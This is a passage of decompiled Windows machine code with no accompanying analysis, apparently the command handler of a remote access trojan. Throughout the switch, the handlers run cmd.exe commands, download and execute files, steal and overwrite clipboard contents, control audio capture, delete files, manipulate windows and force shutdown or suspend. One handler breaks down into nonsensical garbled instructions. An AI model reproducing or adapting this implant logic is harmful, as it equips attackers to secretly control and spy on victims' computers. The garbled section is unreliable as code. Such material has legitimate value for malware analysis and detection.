								__eax = L00401F75(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v424;
								__edi = __eax;
								__ecx = L00401E29( &_v424, __edx, __eflags, 1);
								__eax = L00401F75(__eax);
								__dl = 0x30;
								__ecx =  &_v408;
								__eax = E004179B3( &_v408, __edx, __eax);
								__ecx =  &_v408;
								__eax = L00401ECB( &_v408);
								__ecx =  &_v428;
								__esi = __eax;
								__eax = L00401E29( &_v428, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = E004173A6(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v416;
								__edx = L00401ECB( &_v416);
								__ecx = __edi;
								__eax = E00417868(__edi, __edx);
								goto L105;
							case 2:
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 1);
								__eax = L00401F75(__eax);
								__ecx =  &_v424;
								__ecx = L00401E29( &_v424, __edx, __eflags, 0);
								__eax = L00401F75(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00412EE4(__ebx, __edx);
								goto L102;
							case 4:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413012(__ecx, __eflags);
								goto L102;
							case 5:
								E004020CC(__ebx, _t374 - 0x18, _t344, __eflags, L00401E29( &_v420, _t344, __eflags, 0));
								E004068D2(_t344);
								goto L102;
							case 6:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00414D36(__edx);
								goto L102;
							case 7:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00403FF3(__edx);
								goto L102;
							case 8:
								__eax = E0041601E(__ebx);
								goto L125;
							case 9:
								__eax = E0041614C(__ebx, __eflags);
								goto L125;
							case 0xa:
								__eax = E00416189(__eax);
								goto L125;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 0);
								__eax = E004051EA(0);
								__ecx =  &_v428;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = L00401E29( &_v428, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E0041612B(__ecx, __edx, __edi, __esi);
								goto L125;
							case 0xc:
								__eax = E00416191(__edx);
								goto L125;
							case 0xd:
								__eax = L00405F2A(__ebx, __ecx, __edx);
								__ecx =  &_v420;
								__esi = __eax;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v340;
								__edi = __esp;
								__edx = __esi;
								__edx = E00416B7E(__ebx,  &_v340, __esi);
								__ecx =  &_v372;
								__edx = __eax;
								__ecx = __edi;
								__eax = L00402F73(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L124;
							case 0xe:
								__eflags =  *0x46bb07;
								if( *0x46bb07 != 0) {
									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);
								} else {
									__cl = 1;
									__eax = E004188B1(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0, E00418680, 0, 0, 0);
									 *0x46bb07 = 2;
								}
								goto L125;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v116;
								__eax = E004072F8( &_v116);
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v428;
								__eax = L00401E29( &_v428, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v436;
								__eax = L00401E29( &_v436, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v140;
								__eax = E00405B86( &_v140, __edx);
								__ecx =  &_v212;
								__eax = L00407306(__ebx, __ecx, __esi);
								goto L125;
							case 0x12:
								goto L125;
						}
					}
					goto L125;
				} else {
					if(_t384 == 0) {
						L129();
						_v348 = E00436079(_t221, L00401F75(L00401E29( &_v420, _t344, __eflags, 2)));
						_v344 =  &_v120;
						E00413352(__ebx, _t344, 0x46c238, __eflags,  &_v348);
						_t118 = E0040805C() - 1; // -1
						_t362 = _t118;
						_t228 = L00401E29( &_v428, _t344, __eflags, 3);
						_t378 = _t374 - 0x18;
						E004020CC(_t278, _t378, _t344, __eflags, _t228);
						_t230 = L00401E29( &_v436, _t344, __eflags, 2);
						E004020CC(_t278, _t378 - 0x18, _t344, __eflags, _t230);
						E0040425F(_t278, _t378, L00401F75(L00401E29( &_v444, _t344, __eflags, 1)));
						E0040425F(_t278, _t378 - 0xffffffffffffffe8, L00401F75(L00401E29( &_v452, _t344, __eflags, 0)));
						E004077EE( &_v156, _t344, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00408009( &_v420,  *((intOrPtr*)(L00407FE8(E00408070( &_v156,  &_v504),  &_v500, _t362))));
						}
						L00407FE0(_t278,  &_v212, _t362);
						goto L125;
					} else {
						_t363 = _t359 - 1;
						if(_t363 > 0x33) {
							L125:
							L00401E54( &_v420, _t344);
							L00401FA7();
							L00401FA7();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t363 * 4 +  &M00412D94))) {
								case 0:
									_t247 = E00416B7E(0,  &_v368, GetTickCount());
									_t249 = E00416B7E(0,  &_v336, E00416B2E( &_v368));
									_t251 = E00416CF4(0,  &_v164, E00416AF4( &_v140));
									_t353 = L00402F73(0,  &_v404, L00402EFD( &_v264, L00402F73(0,  &_v240, L00402EFD( &_v216, L00402F97( &_v192, L00401E29( &_v420, _t250, _t385, 0), 0x46c238), _t251), _t385, 0x46c238), _t249), _t385, 0x46c238);
									L00402EFD(_t374 - 0x18, _t257, _t247);
									_push(0x4c);
									E00404A6E(0, 0x46c768, _t257, _t385);
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401ED0();
									L00401FA7();
									L00401FA7();
									_t271 = E00436079(_t269, L00401F75(L00401E29( &_v452, _t257, _t385, 1)));
									if(_t271 == 0) {
										L00401E29( &_v440, _t353, __eflags, 0);
										_t344 = "0";
										_t273 = E00405A22("0");
										__eflags = _t273;
										if(_t273 != 0) {
											_push(0);
											_t342 = 0x46c768;
											goto L10;
										}
									} else {
										_t344 = _t271 + _t271;
										if(E00404814(0x46c768) == 0) {
											L00404E64(0x46c768, _t344, 1);
										} else {
											L00404F77(0x46c238, _t344);
										}
									}
									goto L125;
								case 1:
									_push(0);
									__ecx = 0x46c768;
									L10:
									E004050E5(_t342, 0x46c238);
									goto L125;
								case 2:
									__ecx =  &_v368;
									__eax = E0041755D(__ebx,  &_v368);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E00416CF4(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x46c768;
									__eax = E00404A6E(__ebx, 0x46c768, __edx, __eflags);
									__ecx =  &_v396;
									goto L106;
								case 3:
									goto L125;
								case 4:
									 &_v376 = GetCurrentProcessId();
									__eax = E0043A6FF(__ecx, __eax,  &_v376, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v376;
									__esi = __esp;
									__ecx =  &_v336;
									__edx = E0040D5B1(__ebx,  &_v336, __eflags);
									__ecx =  &_v368;
									__edx = __eax;
									__ecx = __esi;
									__eax = E0040530D(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
									_push(0x4f);
									L124:
									__ecx = 0x46c768;
									__eax = E00404A6E(__ebx, 0x46c768, __edx, __eflags);
									__ecx =  &_v396;
									__eax = L00401FA7();
									__ecx =  &_v364;
									__eax = L00401FA7();
									goto L125;
								case 5:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__ecx = __eax;
									__eax = E00416B51(__ecx);
									goto L125;
								case 6:
									L20:
									__eax = E004132A8(__edx);
									goto L125;
								case 7:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__eax = CloseWindow(__eax);
									goto L125;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags);
									__eax = L00401F75(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L125;
								case 0xa:
									__eax =  &_v372;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v372);
									__ecx = _v376;
									__eax = E00416B51(_v376);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx =  &_v340;
									__eax = E0040425F(0,  &_v340, __eax);
									__edx = L"/C ";
									__ecx =  &_v376;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v376;
									__eax = L00401ED0();
									__ecx =  &_v344;
									goto L106;
								case 0xc:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 1);
									__ecx = 0x46c2d0;
									__eax = L00401F8D(0x46c2d0, __eax);
									__eflags =  *0x46bae3 - __bl;
									if(__eflags == 0) {
										__ecx =  &_v420;
										__eax = L00401E29( &_v420, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E0040559D();
										goto L102;
									}
									goto L125;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									L00401F75(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L125;
								case 0xe:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c850;
									__eax = L00401F8D(0x46c850, __eax);
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 3);
									__eax = L00401F75(__ecx);
									__esi = __eax;
									__eax = L00413EBE(__edx, __edi, __eax);
									__ecx =  &_v432;
									__ecx = L00401E29( &_v432, __edx, __eflags, 2);
									__eax = L00401F75(__ecx);
									__eax = E00436079(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v436;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = L00401E29( &_v436, __edx, _t57, 1);
									L00401F75(__ecx) = E00436079(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = L00413F3B(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x46bd6a = 1;
									__eax = __eax + 0x46bd6a;
									__ecx = __ecx + __ebp;
									 *0x00000000 =  *0x00000000 | 0x006a0000;
									__eflags =  *0x00000000;
									goto L125;
								case 0x10:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = E0040857F(0x46c350, __edx);
									goto L125;
								case 0x11:
									__ecx = 0x46c350;
									__eax = E004093AF(0x46c350);
									goto L125;
								case 0x12:
									__ecx = 0x46c350;
									__eax = E00409520(__ebx, 0x46c350);
									goto L125;
								case 0x13:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c3e0;
									__eax = L00401F8D(0x46c3e0, __eax);
									__ecx = 0x46c350;
									goto L33;
								case 0x14:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = L00408FF2(0x46c350, __edx);
									goto L35;
								case 0x15:
									__esi = 0x46c350;
									__ecx = 0x46c350;
									__eax = L00409D38(0x46c350);
									__ecx = 0x46c350;
									L33:
									__eax = L00408EA0(__ebx, __ecx);
									goto L125;
								case 0x16:
									__eflags =  *0x46bafd - __bl;
									asm("sbb eax, 0x46bafd");
									if(__eflags == 0) {
										__edx = 0;
										__cl = 0;
										__eax = E0040AA16(0);
									}
									goto L125;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c1b8;
									__eax = L00401F8D(0x46c1b8, __eax);
									__ecx = 0x46c1d0;
									__eax = E00404955(0x46c1d0);
									__esp = __esp - 0x10;
									__esi = 0x46bacc;
									__edi = __esp;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi = 0x46c1d0;
									__ecx = 0x46c1d0;
									__eax = E004049D2(__edx);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x46c1b8);
									__eflags =  *0x46baaa - __bl;
									if(__eflags == 0) {
										__eax = E004020CC(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020CC(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00404A6E(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00404B88(__ecx, __edx, 0x404518, __ebx);
									goto L125;
								case 0x18:
									__eax =  *0x46bac0();
									__ecx = 0x46c1d0;
									__eax = L00404DD5(0x46c1d0);
									goto L125;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v420;
									 *0x46ba74 = __bl;
									__eax = L00401E29( &_v420, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 2);
									__eax = L00401F75(__ecx);
									_push(__eax);
									__ecx =  &_v432;
									__ecx = L00401E29( &_v432, __edx, __eflags, 1);
									__eax = L00401F75(__ecx);
									__eax = E00436079(__ecx, __eax);
									__ecx =  &_v436;
									__esi = __eax;
									__ecx = L00401E29( &_v436, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__eax = E00436079(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E004016D8(__ecx, __edx, __edi, __esi);
									goto L125;
								case 0x1a:
									_push( *0x46bab8);
									__eax = __eax ^ 0x0046bab8;
									 *0x46ba74 = 1;
									waveInStop(??) = waveInClose( *0x46bab8);
									goto L125;
								case 0x1b:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__eax = 0x46bd6c + __eax;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__eax = L00401E29( &_v428, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0040FB78(__edx);
									__esp = __esp + 0x30;
									L35:
									 *0x46bd6c =  *0x46bd6c - 1;
									goto L125;
								case 0x1c:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									L00401F75(__ecx) = DeleteFileW(__eax);
									goto L125;
								case 0x1d:
									__eax = E0040FB4B();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x46bd6c - __ebx;
										if( *0x46bd6c == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									_pop(__edx);
									 *__eax =  *__eax | __eax;
									__al = __al + __ch;
									__eflags = __al;
									E0040B107();
									asm("adc bl, [esi]");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x12ffbee1)) =  *((intOrPtr*)(__eax - 0x12ffbee1)) + __bl;
									 *__ecx =  *__ecx - __al;
									asm("popad");
									__eax = __eax - 0x2d610041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x1affbee1)) =  *((intOrPtr*)(__ecx - 0x1affbee1)) + __ah;
									_pop(ds);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0xa004120)) =  *((intOrPtr*)(__eax + 0xa004120)) + __cl;
									 *__ecx =  *__ecx & __al;
									asm("das");
									 *__ecx =  *__ecx & __al;
									_push(__esi);
									 *__ecx =  *__ecx & __al;
									_pop(__edx);
									 *__ecx =  *__ecx & __al;
									_t170 = __eax;
									__eax = __edx;
									__edx = _t170;
									 *__ecx =  *__ecx & __al;
									asm("in al, dx");
									 *__ecx =  *__ecx & __al;
									 *[cs:ecx] =  *[cs:ecx] & __eax;
									_push(__edi);
									 *__ecx =  *__ecx & __eax;
									asm("aam 0x21");
									__ecx = __ecx + 1;
									__al = __al + __ah;
									 *__ecx =  *__ecx & __eax;
									__eax = __eax + 0x14004122;
									__al = __al &  *__ecx;
									__esp = __esp &  *__edx;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x22)) =  *((intOrPtr*)(__eax + 0x22)) + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x22)) =  *((intOrPtr*)(__ecx + 0x22)) + __bh;
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __dh;
									 *__ecx =  *__ecx - __eax;
									asm("popad");
									__eax = __eax - 0x2d610041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0xffbede)) =  *((intOrPtr*)(__ecx - 0xffbede)) + __cl;
									__al = __al &  *__ecx;
									asm("adc al, 0x23");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x4bffbedd)) =  *((intOrPtr*)(__eax - 0x4bffbedd)) + __dl;
									__eax = __eax &  *__ecx;
									asm("repe and eax, [ecx]");
									asm("adc [ecx+eax*2], esp");
									 *__esi =  *__esi + __ah;
									__al = __al & 0x00000041;
									__ebx->i = __ebx->i + __dh;
									__al = __al & 0x00000041;
									_a32 = _a32 + __al;
									__ecx = __ecx + 1;
									__bl = __bl + __dl;
									__al = __al & 0x00000041;
									 *((intOrPtr*)(__esi + 0x25)) =  *((intOrPtr*)(__esi + 0x25)) + __al;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x3f004125)) =  *((intOrPtr*)(__eax + 0x3f004125)) + __bl;
									asm("daa");
									__ecx = __ecx + 1;
									_a603996450 = _a603996450 + __ah;
									asm("daa");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x40ffbed9)) =  *((intOrPtr*)(__ecx - 0x40ffbed9)) + __ah;
									asm("daa");
									__ecx = __ecx + 1;
									__ebx->i = __ebx->i + __cl;
									 *__ecx =  *__ecx - __al;
									asm("adc eax, 0x35004128");
									 *__ecx =  *__ecx - __al;
									_push(__ebp);
									 *__ecx =  *__ecx - __al;
									__eflags =  *__ecx;
									if( *__ecx == 0) {
										__ecx = __ecx + 1;
										__ch = __ch + __cl;
										 *__ecx =  *__ecx - __al;
										asm("popad");
										__eax = __eax - 0x29170041;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edx - 0x50ffbed6)) =  *((intOrPtr*)(__edx - 0x50ffbed6)) + __cl;
										__al = __al -  *__ecx;
										asm("scasd");
										__eax = __eax -  *__ecx;
										asm("daa");
										__al = __al - 0x41;
										 *((intOrPtr*)(__edi + 0x2c)) =  *((intOrPtr*)(__edi + 0x2c)) + __al;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ah;
										__ecx = __ecx + 1;
										__bh = __bh + __ah;
										__eax = __eax -  *__ecx;
										__eflags = __eax;
									}
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __al;
									__al = __al - 0x41;
									__ch = __ch + __ch;
									__al = __al - 0x41;
									__ah = __ah + __dh;
									__al = __al - 0x41;
									__bl = __bl + __bh;
									__al = __al - 0x41;
									 *((intOrPtr*)(__esi + 0x6700412c)) =  *((intOrPtr*)(__esi + 0x6700412c)) + __bh;
									__al = __al - 0x41;
									 *__edx =  *__edx + __al;
									__eax = __eax - 0x2c710041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi - 0x59ffbed5)) =  *((intOrPtr*)(__edi - 0x59ffbed5)) + __bl;
									__eax = __eax -  *__ecx;
									__al = __al ^ 0x0000002b;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x2d)) =  *((intOrPtr*)(__ecx + 0x2d)) + __ah;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									asm("adc al, [ecx]");
									asm("adc al, [edx]");
									__edx = __edx +  *__edx;
									__al = __al + 5;
									_push(es);
									_pop(es);
									asm("adc dl, [edx]");
									asm("adc cl, [eax]");
									 *__edx =  *__edx | __ecx;
									asm("adc cl, [ebx]");
									__al = __al | 0x00000012;
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									__eax = __eax | 0x12100f0e;
									asm("adc dl, [edx]");
									asm("adc [esi-0x75], edx");
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									E00404818(__ebx, __esi + 4, 0) = __esi;
									_pop(__esi);
									return __esi;
									goto L130;
								case 0x1f:
									__eax = E0040B80B(__ebx, __eflags);
									goto L125;
								case 0x20:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E29( &_v424, __edx, __eflags, 1);
									__eax = L00401F75(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E004179B3( &_v408, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v408;
									_push(L00401ECB( &_v408));
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 2);
									__eax = L00401F75(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L57;
									}
									goto L105;
								case 0x21:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E29( &_v424, __edx, __eflags, 1);
									__eax = L00401F75(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E004179B3( &_v408, __edx, __eax);
									__ecx =  &_v408;
									__eax = L00401ECB( &_v408);
									__ecx =  &_v428;
									__esi = __eax;
									__eax = L00401E29( &_v428, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = E004173A6(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L57:
										__esp = __esp - 0x18;
										__eax =  &_v420;
										__ecx = __esp;
										E00407352(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B465();
										__esp = __esp + 0x18;
									}
									goto L105;
								case 0x22:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 2);
									__eax = L00401F75(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v424;
									__ecx = L00401E29( &_v424, __edx, __eflags, 1);
									__eax = L00401F75(__eax);
									__ebx = 0;
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 0);
									L00401F75(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
									goto L125;
								case 0x23:
									__eax = E004132F7();
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00405A22(__edx);
									__ecx =  &_v424;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = L00401E29( &_v424, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00405A22(__edx);
										__ecx =  &_v424;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = L00401E29( &_v424, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00405A22(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v420;
												__esi = __eax;
												__eax = L00401E29( &_v420, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00405A22(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v420;
													__eax = L00401E29( &_v420, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00405A22(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L74;
													}
												} else {
													_push(0);
													_push(0);
													L74:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v420;
												__ecx = L00401E29( &_v420, __edx, __eflags, 1);
												__eax = L00401F75(__ecx);
												__eax = E00436079(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L69;
											}
										} else {
											__ecx = L00401E29( &_v424, __edx, __eflags, 1);
											__eax = L00401F75(__ecx);
											__eax = E00436079(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L69;
										}
									} else {
										__ecx = L00401E29( &_v424, __edx, __eflags, 1);
										__eax = L00401F75(__ecx);
										__eax = E00436079(__ecx, __eax);
										L69:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L125;
								case 0x24:
									L80:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x45f714 =  !=  ? __edi : 0x45f714;
										__ecx =  &_v400;
										__eax = E0040425F(__ebx,  &_v400,  !=  ? __edi : 0x45f714);
										__esp = __esp - 0x18;
										__edx =  &_v404;
										__ecx = __esp;
										__eax = E00416CF4(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x46c768;
										__eax = E00404A6E(__ebx, 0x46c768, __edx, __eflags);
										L105:
										__ecx =  &_v400;
										L106:
										__eax = L00401ED0();
									}
									goto L125;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v420;
										__ecx = L00401E29( &_v420, __edx, __eflags, 0);
										__eax = E00402469();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v424;
										__esi = __eax;
										__ecx = L00401E29( &_v424, __edx, __eflags, 0);
										__eax = E00402469();
										__ecx =  &_v428;
										__ecx = L00401E29( &_v428, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L79;
									}
									goto L125;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L79:
										__eax = CloseClipboard();
										goto L80;
									}
									goto L125;
								case 0x27:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = __eax;
									__eax = E0040A15B(__ecx);
									goto L125;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v420;
									_v404 = 0;
									_v408 = 0;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E00416A69(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__ecx = _v408;
										E0040A15B(_v408) = L00438E01(_v408);
										L26:
										_pop(__ecx);
									}
									goto L125;
								case 0x29:
									__eax = E0040AACF(__edx);
									goto L125;
								case 0x2a:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0041365F(__edx);
									goto L102;
								case 0x2b:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004111E1(__edx);
									goto L102;
								case 0x2c:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00405331(__edx);
									goto L102;
								case 0x2d:
									_push(__ecx);
									__esi = 0x46c560;
									__ecx = 0x46c560;
									__eax = E00402469();
									__ecx = 0x46c560;
									__eax = L00401F75(0x46c560);
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									E00402469() = __eax + 1;
									__ecx =  &_v424;
									__ecx = L00401E29( &_v424, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx = 0x46c518;
